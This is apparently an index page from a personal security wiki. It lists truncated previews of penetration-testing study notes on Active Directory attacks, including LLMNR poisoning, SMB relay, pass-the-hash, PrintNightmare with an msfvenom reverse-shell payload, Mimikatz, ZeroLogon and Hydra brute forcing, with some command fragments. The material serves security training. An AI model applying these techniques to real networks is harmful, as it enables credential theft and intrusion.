File Transfers and Data Exfiltration
Repository for any notes, snippets, and cheat sheets pertaining to Proxmox.
Repository for any notes, snippets, and cheat sheets pertaining to the overall Wazuh tech stack.
Repository for notes, snippets, and cheat sheets pertaining to WordPress.
Repository for notes, snippets, and cheat sheets pertaining to Fleet DM for osquery.
Repository for notes, snippets, and cheat sheets pertaining to Ansible.
Certificates and Encryption
PJPT Study Group Lessons
This book will hold all of the lesson plans and/or supplementary material for when I teach in the PJPT study group in the F0xhunt Discord server (https://discord.gg/f0xhunt)
Post Exploitation: Enumeration
Post Exploitation: Attacks
Automation with Ansible
FleetDM On Debian 11
Initial Attack Vectors
Internal: --------- Attack vectors that are ideal for internal penetration tests, where the attacker plants a device on the network or uploads tools to a compromised host. External: --------- Attack vectors that could work in both internal and external ...
Mapping Mailboxes with Mutt
Command Line Tricks
Session 2: Nov. 13, 2023
Computer Networking Fundamentals
LLMNR Poisoning (Internal)
Note: Network Environment Given that LLMNR is a name resolution protocol that works on the Local Area Network (LAN), this attack method cannot be performed from a different subnet. The attacker would have to compromise a host on the LAN and upload tools, or p...
SMB Relay (Internal/External)
Note: Network Environment This attack works best in a flat network. However, as long as the attacker machine and target(s) are routeable and no firewalls are blocking required ports, it could work across network segments. What is SMB Relay? A man-in-the-m...
IPv6 DNS Spoofing (Internal)
Note: Network Environment This spoofing attack works by sending a router advertisement to the multicast address ff02::1. Therefore, it will only affect domain-joined hosts on the same segment as the attacker machine. What is IPv6 DNS Spoofing? An attacker announc...
Passback Attacks (Internal/External)
What's the Flaw? Usually involves an insecure device -- like a printer or multifunction device -- which is configured with an LDAP or SMTP client and credentials. It could be a web server too -- where there is an LDAP or SMTP client. The credentials are usual...
Overview A set of PowerShell functions that can be used to enumerate ActiveDirectory. Part of the larger PowerSploit Framework Usage Transfer PowerView.ps1 to the compromised target. Requires a PowerShell session. Then, source the file into the current se...
1. Installation sudo apt install -y neo4j bloodhound 2. Setup sudo neo4j console & Navigate to http://localhost:7474 Login is neo4j and change the default password sudo bloodhound & Log into the neo4j user account with the new password 3. Data...
net.exe Drawbacks net does not show nested groups net only shows up to 10 groups even if a user is in more Local System net user – Enumerate system local users net user user.name – Get information about a specific local user net localgroup – Enume...
Pass the Password
Overview Cracked a hash or discovered a password for a domain user. Use the password and crackmapexec to pass it around the network and see if we can log into any other target(s) with that credential Attack 1: crackmapexec sudo crackmapexec smb <target-or...
Pass the Hash
Overview Dumped the SAM or LSA and now have hashes for domain or local users. Use the hash and crackmapexec to pass it around the network and see if we can log into any other target(s) with that credential Anatomy of a Windows Hash username:SID:LM_HASH:NT...
Overview Tokens are temporary keys that allow a user to perform actions on a system or network without having to provide a password; similar to session cookies on a web site. The tokens are generated once a user logs onto a system or RDP session. They remain ...
Overview The attacker uses a known username and password of a user on a domain. A typical Kerberos workflow is: Once a user logs into a domain-joined system, they get a TGT (ticket-granting ticket). Then, they'll use that TGT to request a TGS (ticket-gra...
Group Policy Preferences (GPP)
Overview GPP allows admins to create policies with embedded credentials. The credentials are encrypted and stored in a cPassword. The key was accidentally released. What's the Flaw? The MS14-025 patch does not apply to GPP passwords embedded prior to the ...
Local Privilege Escalation https://github.com/calebstewart/CVE-2021-1675
Remote Code Execution https://github.com/cube0x0/CVE-2021-1675 Contains full details on scanning and mitigation. Could potentially be used against a domain controller for easy access to a reverse shell. Create payload msfvenom -p <payload> LHOST=<kali-ip...
Overview https://github.com/gentilkiwi/mimikatz There are various spin-offs of the Mimikatz project, including a PowerShell variety. Mimikatz is primarily used to dump hashes from LSASS, pass hashes, or generate Kerberos tickets for use in attacks. ...
Caution This can potentially break a domain controller, due to the fact that this attack temporarily removes the password from a domain controller. After testing this attack, the original password should be restored. ZeroLogon Checker https://github.com/Secu...
AES 256 ECB
Example from Vulnhub https://www.vulnhub.com/entry/prime-1,358/ In this challenge, a script outputs an AES-256 encrypted file and a hint in key.txt The hint says to hash the word "ippsec" with the MD5 algorithm This is the key to decrypt the hash Hash Base 6...
Use FFUF to Brute Force Login
Brute Force with a Request File Start Burp Make a randomized login to the target web page Copy the output, for example: POST /login HTTP/1.1 Host: 10.10.10.10 Content-Length: 37 Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Windows NT ...
Brute Forcing Logins with Hydra
Example Usage hydra -IVVf [ip-or-hostname] -t [threads] -l [username] -P [password-list] [http-<method>-form] [path-to-login-page:<username-param>=^USER^&<password-param>=^PASS^&<additional-form-param>=[param-value]:<login-error-message>:<session-id> I like ...
Nmap Scanning with Categories
Example 1: Nmap script scan with categories Categories https://nmap.org/book/nse-usage.html#nse-categories auth broadcast brute default discovery dos exploit external fuzzer intrusive malware safe version vuln # Scan UDP/161 with all snmp-* scripts # Do ...